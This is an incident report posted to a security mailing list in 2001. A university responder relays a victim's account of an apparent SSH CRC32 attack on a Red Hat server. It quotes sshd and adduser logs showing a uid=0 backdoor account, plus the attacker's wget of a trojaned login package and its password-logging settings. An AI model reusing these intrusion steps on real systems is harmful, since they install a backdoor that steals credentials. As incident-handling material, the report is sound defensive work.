Attacks against SSH?

From: johan.augustsson@adm.gu.se
Date: 12/03/01


Date: Mon, 03 Dec 2001 08:30:23 +0100
From: johan.augustsson@adm.gu.se
To: incidents@securityfocus.com


I stumbled over this post at the openssh-unix-dev mailing list last week -
http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
The poster claims that he had OpenSSH-2.9p2-8.7 (latest update for
RedHat 7.0) up and running when he received what looks to be a
CRC32 attack. A few minutes later you can see (he posted parts of the
logfile) a new user being created with uid=0 and then how a connection
is made from a system in Israel.

There has been no confirmation about what he writes but I received the
following mail as an answer to my questions.

------ Message ------
I posted an openssh security alert earlier today and already got some
responses.
Thanks for everything.

Instead of replying to everyone individually I composed the details of
the attack.

+++

It does not look like a job of worms.
Snort did not detect a mass port scan from the attacker's ip address. It
seems that he (I assumed, so I don't have to type he/she all the way)
just wants to gain access through openssh.

The server is running Red Hat 7.0, with all packages up to date. The
following daemons are running: wu-ftpd, apache, telnet, openssh, named.
I never access the system via telnet, it is there just for backup
purposes.

> > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
> > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
> > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
> > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input.
> > Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as)
> > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
> > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
> > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
> > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash

After the attacker gained root access, he created two users, mattan and
mattanl.
He then downloaded a package: wget http://home.dal.net/resolve/login.tgz.
The target site has been compromised. (hacked by a hacker group in
Israel)
This is a login replacement package, it logs the user id and passwords.
He modified rk.h to:
#define MY_LOGFILE "/dev/ttypz"
#define MY_PASSWORD "1245890"
After he compiled and installed the login replacement, something went
wrong. /bin/login was zero bytes in length. So when he came back using
telnet, he was denied access. I also disabled sshd and kept one session
open for remote control after I found login was replaced. I md5-checked
the system against a good backup, nothing else was altered.

I will try to sniff all packets that come to this server on the ssh
port. If he attempts to crack the server again, I will have more
details. But I guess I will have to turn the server back on.

Thanks for all your time
------ End of message ------

I had some further questions so I mailed the guy once again but have
not received any answer.

So, to the main question.
Has anyone else had a system compromised by the CRC32-attack when
running a version of sshd that is believed to be secure? OpenSSH-2.3.0
or later, SSH 1.2.32 or later.

/Johan Augustsson

--------------------------------------------------------------------
Johan Augustsson Phone: +46 (0)31 773 1000
Incident Response Team Fax: +46 (0)31 773 1087
Göteborg University E-mail: Johan.Augustsson@adm.gu.se
Sweden
--------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com


